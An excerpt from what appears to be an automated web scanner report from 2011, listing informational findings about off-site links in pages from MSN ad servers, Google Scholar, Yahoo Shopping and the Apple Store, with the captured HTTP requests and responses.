<h2 class="title"> <a target="_blank" class="usg-AFQjCNEsMY3za2OdC8Ky5rGxAvWNuzXFgg " href="http://www.guardian.co.uk/uk/2011/feb/03/human-bse-blood-test" id="MAA4BEgAUABgAWoCdWt6AW0"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.scotsman.com/news/New-test-will-identify-human.6709624.jp" target="_blank" class="usg-AFQjCNGGPxMqqgQqipZocXC2LLCsc3LJRg " id="MAA4BEgAUAJgAmoCdWt6AW0">New test will identify human carriers of mad cow disease</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGM9hDVcCTbOVTrzxQwvoAv_WUXqw " href="http://news.sky.com/skynews/Home/UK-News/Scientists-Discover-First-Accurate-Blood-Test-For-Human-Form-Of-Mad-Cow-Disease/Article/201102115921588?lpos=UK_News_News_Your_Way_Region_7&amp;lid=NewsYourWay_ARTICLE_15921588_Scientists_Discover_First_Accurate_Blood_Test_For_Human_Form_Of_Mad_Cow_Disease" id="MAA4BEgAUANgCGoCdWt6AW0"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcipU11ogBoBxG6KFNgt-H92lspA " href="http://www.mirror.co.uk/news/top-stories/2011/02/03/first-reliable-blood-test-for-human-version-of-mad-cow-disease-developed-115875-22894771/" id="MAA4BEgAUARgCGoCdWt6AW0"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHgyq4D9cVZoiLZIW_CdaHFMM-Ewg " href="http://www.latimes.com/health/boostershots/la-heb-mad-cow-20110202,0,1943157.story" id="MAA4BEgAUAZgCGoCdWt6AW0"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/health/healthnews/8298580/Clegg-pledges-to-repeal-law-disqualifying-mentally-ill-MPs.html" class="usg-AFQjCNGjTKcXU8KuewYjPiC306G2e8Mo8g " title="Telegraph.co.uk"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/XhMHE-OC2Nti2M/0.jpg" width="80" height="50"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/health/healthnews/8298580/Clegg-pledges-to-repeal-law-disqualifying-mentally-ill-MPs.html" class="usg-AFQjCNGjTKcXU8KuewYjPiC306G2e8Mo8g "> Telegraph.co.uk </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFBuEpxg6y4HNC3IX0AcP5SvT5g0A " href="http://www.barchester.com/Healthcare-News/Government-&#39;must-not-overlook-dementia&#39;/376/4103" id="MAA4BEgBUABgAWoCdWt6AW0"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.pulsetoday.co.uk/story.asp?sectioncode=23&amp;storycode=4128421&amp;c=2" target="_blank" class="usg-AFQjCNFzGwfugBInCGQceoAxmHQ9-zbmUg " id="MAA4BEgBUAFgAmoCdWt6AW0">Access to talking therapies extended to children</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/commentisfree/2011/feb/03/good-news-mental-health-twitter" target="_blank" class="usg-AFQjCNGXj4L-mx5GWrgmKoMJaQMn3FCn4Q " id="MAA4BEgBUAJgAmoCdWt6AW0">Gosh, it was Good News Wednesday for mental health</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH9OL4Ge16LvnY5JJ_VaN7MjmGlig " href="http://www.bbc.co.uk/go/rss/int/news/-/news/health-12338540" id="MAA4BEgBUANgCGoCdWt6AW0"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGjTKcXU8KuewYjPiC306G2e8Mo8g " href="http://www.telegraph.co.uk/health/healthnews/8298580/Clegg-pledges-to-repeal-law-disqualifying-mentally-ill-MPs.html" id="MAA4BEgBUARgCGoCdWt6AW0"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHvcSLGNkj1O3nYRDVBfuXO-ASpVQ " href="http://www.pharmatimes.com/Article/11-02-03/Government_cash_boost_to_improve_mental_health.aspx" id="MAA4BEgBUAZgCGoCdWt6AW0"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.telegraph.co.uk/health/healthnews/8300156/Ambulances-adapted-to-cope-with-increasing-number-of-obese-patients.html" class="usg-AFQjCNFe2rweO5mlY83daH1dJO9dl5ldvg " title="Telegraph.co.uk"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/drV3b10pPRphaM/0.jpg" width="80" height="50"></a> <div class="source "> <a target="_blank" href="http://www.telegraph.co.uk/health/healthnews/8300156/Ambulances-adapted-to-cope-with-increasing-number-of-obese-patients.html" class="usg-AFQjCNFe2rweO5mlY83daH1dJO9dl5ldvg "> Telegraph.co.uk </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGxxt3_BBTiISwShjKOzGENPOsCRw " href="http://www.bbc.co.uk/go/rss/int/news/-/news/health-12355693" id="MAA4BEgCUABgAWoCdWt6AW0"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.stroudnewsandjournal.co.uk/news/8832393.More_obese_patient_ambulances_set_to_hit_the_road/" target="_blank" class="usg-AFQjCNG2wcf_BMKLdhtwYvcGVJEHI3ljMg " id="MAA4BEgCUAJgAmoCdWt6AW0">More obese patient ambulances set to hit the road</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGK9nreinxptTQJikNbqpN4AW_XnQ " href="http://www.nursingtimes.net/nursing-practice/clinical-specialisms/accident-and-emergency/ambulances-refitted-to-cater-for-obese/5025067.article" id="MAA4BEgCUANgCGoCdWt6AW0"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF7ZAQcLVaM3pMf4KMyUnKDcQeZxA " href="http://www.dailyecho.co.uk/news/8832626.Ambulances_upgraded_to_deal_with_fatter_patients/" id="MAA4BEgCUARgCGoCdWt6AW0"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF1QaLVpDDk3Q7OX83dlSubFZKlBA " href="http://www.edp24.co.uk/news/health/norfolk_s_new_ambulances_to_meet_rise_in_obesity_1_792572" id="MAA4BEgCUAVgCGoCdWt6AW0"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGjhk9UKAWDlvJcl50RRpB3uYzFmQ " href="http://www.netdoctor.co.uk/interactive/news/theme_news_detail.php?id=800383414&amp;tab_id=116" id="MAA4BEgCUAZgCGoCdWt6AW0"><span class="titletext">
...[SNIP]...
<a href="javascript:void(0)" class="email-link"><img class="icon email-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">Email this story</a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFlybXsy3pBZa5iBmv5EllLIrFiYA " href="http://www.nature.com/news/2011/110202/full/news.2011.65.html" id="MAE4BEgAUABgAWoCdWt6Amly"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEHxI9-9JtXhxAeLaKyQ0wk8KYkKA " href="http://www.heatworld.com/Celeb-News/2011/01/P-Diddy-sued-for-1-trillion-and-accused-of-causing-911-attacks/" id="MAE4BEgBUABgAWoCdWt6Amly"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF7gExwsCKRPpHS30ktirCWDGq4Rg " href="http://www.economist.com/opinion/displaystory.cfm?story_id=18070170&amp;fsrc=rss" id="MAE4BEgCUABgAWoCdWt6Amly"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFZ9ii7woMCgPml6w6o22ZNj2zAxQ " href="http://www.telegraph.co.uk/comment/columnists/christopherbooker/8290469/How-BBC-warmists-abuse-the-science.html" id="MAE4BEgDUABgAWoCdWt6Amly"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHuu4BiJBeiEoIRVaeRFWRlbO-zQg " href="http://www.guardian.co.uk/tv-and-radio/2011/jan/30/louis-theroux-ultra-zionists-documentary" id="MAE4BEgEUABgAWoCdWt6Amly"><span class="titletext">
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=uk&amp;hl=en&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

18.96. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHQ2&AP=1402 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135&TUID=1; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1048
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8009941-T22841720-C83000000000035182
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Fri, 04 Feb 2011 02:29:39 GMT
Content-Length: 1048


//<![CDATA[
function getRADIds() { return{"adid":"83000000000035182","pid":"8009941","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0003S/83000000000035182.1??PID=8009941&amp;UIT=G&amp;TargetID=22841720&amp;AN=1765474321&amp;PG=MSNHQ2&amp;ASID=ea57e12a09f040369418e38a14c57f6e" target="_blank"><img src="http://ads2.msads.net/CIS/110/000/000/000/005/545.jpg" width="100" height="25" alt="$7 Online Stock Trades! Click here to learn more!" border="0" /></a></div>');document.write('<img src="http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/1765474321" alt="" height="1" width="1" style="display:none;" />');


document.close();

//]]>
...[SNIP]...

18.97. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNIF1&AP=1455 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135&TUID=1; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1026
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8190097-T21144173-C39000000000034928
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Fri, 04 Feb 2011 02:29:40 GMT
Content-Length: 1026


//<![CDATA[
function getRADIds() { return{"adid":"39000000000034928","pid":"8190097","targetid":"21144173"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0003S/39000000000034928.1??PID=8190097&amp;UIT=G&amp;TargetID=21144173&amp;AN=1362100664&amp;PG=MSNIF1&amp;ASID=52c6a10c9a424c20816d24bed6d8fb1f" target="_blank"><img src="http://ads2.msads.net/CIS/105/000/000/000/007/735.jpg" width="300" height="60" alt="Click Here!" border="0" /></a></div>');document.write('<img src="http://ad.doubleclick.net/ad/N6421.152847.MSN.COM/B5094800.20;abr=!ie4;abr=!ie5;sz=1x1;ord=1362100664?" alt="" height="1" width="1" style="display:none;" />');


document.close();

//]]>
...[SNIP]...

18.98. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNSUR&AP=1089 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135&TUID=1; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 404
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P3782944-T8338642-C521263
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Fri, 04 Feb 2011 02:29:40 GMT
Content-Length: 404


//<![CDATA[
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 1, 1);}
document.write('<a href="http://g.msn.com/0AD00004/521263.1??PID=3782944&amp;UIT=G&amp;TargetID=8338642&amp;AN=1243759386&amp;PG=MSNSUR" ><img src="http://ads1.msads.net/ads/1/0000000001_000000000000000017246.gif" width="1" height="1" alt="Click&#32;Here&#33;" border="0" /></a>
...[SNIP]...

18.99. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNSV1&AP=1402 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135&TUID=1; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 406
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P6574141-T21144176-C696341
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Fri, 04 Feb 2011 02:29:39 GMT
Content-Length: 406


//<![CDATA[
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 1, 1);}
document.write('<a href="http://g.msn.com/0AD0001C/696341.1??PID=6574141&amp;UIT=G&amp;TargetID=21144176&amp;AN=2015447945&amp;PG=MSNSV1" target="_blank"><img src="http://ads1.msads.net/ads/1/0000000001_000000000000000151527.gif" width="1" height="1" alt="&#46;" border="0" /></a>
...[SNIP]...

18.100. http://scholar.google.com/schhp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /schhp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /schhp?hl=en&tab=ws HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=a3c3ea2bbb601f49; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=a3c3ea2bbb601f49:TM=1296765148:LM=1296765148:S=8X6nq-836hwhQm8k; expires=Sat, 02-Feb-2013 20:32:28 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 20:32:28 GMT
Server: scholar
Expires: Thu, 03 Feb 2011 20:32:28 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><title>Google Scholar</title><style>body,td,a,p,.h{font-family:arial,sans-ser
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=s1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

18.101. http://shopping.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search;_ylc=X3oDMTE4aHZtZGtyBF9TAzc4NDcxODMyNQRrA2FiYyBkZXZlbG9wbWVudARzZWMDdGl0bGU-?p=abc+development&sem=google/x22 HTTP/1.1
Host: shopping.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:33:45 GMT
Set-Cookie: B=eso7aa56km499&b=3&s=7m; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: SHOPSEMAFFILIATE=sem=google/x22; expires=Thu, 03-Feb-2011 21:03:45 GMT; path=/; domain=.shopping.yahoo.com
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 105590

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<link rel="stylesheet" href="http://l.yimg.com/a/combo?yui/2.7.0/build/reset-fonts-grids/reset-fonts-grids.css&shop/s2/sh_global_201012091614.css&shop/s2/sh_listing_201008271925.css&uh/15/css/uh_rsa-1.0.5.css" type="text/css"/>

<script type="text/javascript">
...[SNIP]...
<div class="pad">
<link type="text/css" rel="stylesheet" href="http://l.yimg.com/kx/uh/css/yunivhead_r3263.css" />
<style>
...[SNIP]...
</div>
<script charset="utf-8" type="text/javascript" src="http://l.yimg.com/kx/uh/js/uh2_rsa_r3267.js"></script>
...[SNIP]...
<!-- END_SLUG--><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=160 HEIGHT=600 SRC="http://ad.yieldmanager.com/st?_PVID=1hW7MWKJ30k589vb.WgBIiKUrcHW801LESkAALpA&ad_type=iframe&ad_size=160x600&site=140497&section_code=14485914&cb=1296765225070677&zip=&ycg=&yyob=&promote_sizes=1&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15lsbe9lk/M=787833.14485914.14323757.1471092/D=shp/S=14489115:SKY/Y=YAHOO/EXP=1296772425/L=1hW7MWKJ30k589vb.WgBIiKUrcHW801LESkAALpA/B=pn8yG0wNPR0-/J=1296765225070677/K=auTwX1BFqHFqIlRG3B4uWg/A=6284739/R=0/*"></IFRAME>
...[SNIP]...
<div class="warn" style="float:left; padding-right:10px;"><img src="http://l.yimg.com/us.yimg.com/i/nt/ic/ut/bsc/warn16_1.gif" width="16" height="16" alt="warning"></div>
...[SNIP]...
2Bdevelopment%26skd=0%26dl=1%26source=xmlapi%26search_id=f7a0e27c4fb24781171530156319ff95%26set=1296765220%26k=074eddce0a97061326eb6ec4dee75e89" rel="nofollow" target="_blank" upstrackindex="74598579"><img src="http://i.pgcdn.com/pi/7/45/98/74598579_75.jpg" style="" alt="Microsoft Visual Studio 2008 Professional Edition Software" title="Microsoft Visual Studio 2008 Professional Edition Software "></a>
...[SNIP]...
2Bdevelopment%26skd=0%26dl=1%26source=xmlapi%26search_id=f7a0e27c4fb24781171530156319ff95%26set=1296765220%26k=ba1e58d244b6ad91595ab9d718ce47d4" rel="nofollow" target="_blank" upstrackindex="15004520"><img src="http://i.pgcdn.com/pi/1/50/04/15004520_75.jpg" style="" alt="Microsoft Visual Studio Team Edition 2005 for Software Developers" title="Microsoft Visual Studio Team Edition 2005 for Software Developers "></a>
...[SNIP]...
<a href="/75764749-microsoft-visual-studio-team-system-2008-team-foundation-server-software/;_ylt=A0PDtsApEUtN0ksAW0cbFt0A" rel="nofollow" ><img src="http://i.pgcdn.com/pi/7/57/64/75764749_75.jpg" style="" alt="Microsoft Visual Studio Team System 2008 Team Foundation Server Software" title="Microsoft Visual Studio Team System 2008 Team Foundation Server Software"></a>
...[SNIP]...
<a href="/86107486-adobe-macromedia-jrun-software/;_ylt=A0PDtsApEUtN0ksAYkcbFt0A" rel="nofollow" ><img src="http://i.pgcdn.com/pi/8/61/07/86107486_75.jpg" style="" alt="Adobe Macromedia JRun Software" title="Adobe Macromedia JRun Software"></a>
...[SNIP]...
2Bdevelopment%26skd=0%26dl=1%26source=xmlapi%26search_id=f7a0e27c4fb24781171530156319ff95%26set=1296765220%26k=a8451f775f6d1610c97d4bf669ff108e" rel="nofollow" target="_blank" upstrackindex="17089314"><img src="http://i.pgcdn.com/pi/1/70/89/17089314_75.jpg" style="" alt="Adobe Macromedia JRun Software" title="Adobe Macromedia JRun Software "></a>
...[SNIP]...
2Bdevelopment%26skd=0%26dl=1%26source=xmlapi%26search_id=f7a0e27c4fb24781171530156319ff95%26set=1296765220%26k=67cf989066b1aa0b299474ca19f3db0e" rel="nofollow" target="_blank" upstrackindex="75765652"><img src="http://i.pgcdn.com/pi/7/57/65/75765652_75.jpg" style="" alt="Sybase PocketBuilder v.2.0" title="Sybase PocketBuilder v.2.0 "></a>
...[SNIP]...
2Bdevelopment%26skd=0%26dl=1%26source=xmlapi%26search_id=f7a0e27c4fb24781171530156319ff95%26set=1296765220%26k=54629ba9a4577bd8e37594d1bf1e6687" rel="nofollow" target="_blank" upstrackindex="86107711"><img src="http://i.pgcdn.com/pi/8/61/07/86107711_75.jpg" style="" alt="Sybase PocketBuilder v.2.0" title="Sybase PocketBuilder v.2.0 "></a>
...[SNIP]...
<a href="/75764743-microsoft-visual-studio-team-system-2008-development-edition-software/;_ylt=A0PDtsApEUtN0ksAfkcbFt0A" rel="nofollow" ><img src="http://i.pgcdn.com/pi/7/57/64/75764743_75.jpg" style="" alt="Microsoft Visual Studio Team System 2008 Development Edition Software" title="Microsoft Visual Studio Team System 2008 Development Edition Software"></a>
...[SNIP]...
Bdevelopment%26skd=0%26dl=1%26source=xmlapi%26search_id=f7a0e27c4fb24781171530156319ff95%26set=1296765220%26k=8aa2e3d1fb8382634ca638371aecc9c3" rel="nofollow" target="_blank" upstrackindex="736256344"><img src="http://i.pgcdn.com/pi/73/62/56/736256344_75.jpg" style="" alt="Quest software Quest Software TOAD for Oracle Professional Edition Software" title="Quest software Quest Software TOAD for Oracle Professional Edition Software "></a>
...[SNIP]...
Bdevelopment%26skd=0%26dl=1%26source=xmlapi%26search_id=f7a0e27c4fb24781171530156319ff95%26set=1296765220%26k=f0d71c5dd9eded5ab871b31dbd0f4fde" rel="nofollow" target="_blank" upstrackindex="731964908"><img src="http://i.pgcdn.com/pi/73/19/64/731964908_75.jpg" style="" alt="Intel MPI Library Development Kit for Linux Software" title="Intel MPI Library Development Kit for Linux Software "></a>
...[SNIP]...
<a href="/16520499-adobe-macromedia-jrun-software/;_ylt=A0PDtsApEUtN0ksAk0cbFt0A" rel="nofollow" ><img src="http://i.pgcdn.com/pi/1/65/20/16520499_75.jpg" style="" alt="Adobe Macromedia JRun Software" title="Adobe Macromedia JRun Software"></a>
...[SNIP]...
<a href="/75764744-microsoft-visual-studio-team-system-2008-team-foundation-server-software/;_ylt=A0PDtsApEUtN0ksAmkcbFt0A" rel="nofollow" ><img src="http://i.pgcdn.com/pi/7/57/64/75764744_75.jpg" style="" alt="Microsoft Visual Studio Team System 2008 Team Foundation Server Software" title="Microsoft Visual Studio Team System 2008 Team Foundation Server Software"></a>
...[SNIP]...
<a href="/76753941-microsoft-visual-studio-team-system-2008-team-suite-software/;_ylt=A0PDtsApEUtN0ksAoUcbFt0A" rel="nofollow" ><img src="http://i.pgcdn.com/pi/7/67/53/76753941_75.jpg" style="" alt="Microsoft Visual Studio Team System 2008 Team Suite Software" title="Microsoft Visual Studio Team System 2008 Team Suite Software"></a>
...[SNIP]...
Bdevelopment%26skd=0%26dl=1%26source=xmlapi%26search_id=f7a0e27c4fb24781171530156319ff95%26set=1296765220%26k=97b7db2aaae7ee6c76d928dcb11defb4" rel="nofollow" target="_blank" upstrackindex="769657581"><img src="http://i.pgcdn.com/pi/76/96/57/769657581_75.jpg" style="" alt="Mastering Microsoft Visual Basic 6 Development" title="Mastering Microsoft Visual Basic 6 Development "></a>
...[SNIP]...
c%2Bdevelopment%26skd=0%26dl=1%26source=xmlapi%26search_id=f7a0e27c4fb24781171530156319ff95%26set=1296765220%26k=ca23fcd50baf695d15339783dcc1094a" rel="nofollow" target="_blank" upstrackindex="988560"><img src="http://i.pgcdn.com/pi/0/09/88/988560_75.jpg" style="" alt="MacroMedia Contribute v.2.0" title="MacroMedia Contribute v.2.0 "></a>
...[SNIP]...
<a target="_href" href="http://help.yahoo.com/l/us/yahoo/shopping/new/shop-138.html"><img src="http://l.yimg.com/a/i/us/sh/gr/help_icon.gif"></a>
...[SNIP]...
<!-- #postdoc -->

<script type="text/javascript" src="http://l.yimg.com/a/combo?yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js&yui/2.7.0/build/imageloader/imageloader-min.js&shop/s2/sh_global_201002251741.js&shop/s2/sh_listing_201010132254.js"></script>
...[SNIP]...

18.102. http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID?nnmm=acct&sf=wHF2F2PHCCCX72KDY HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
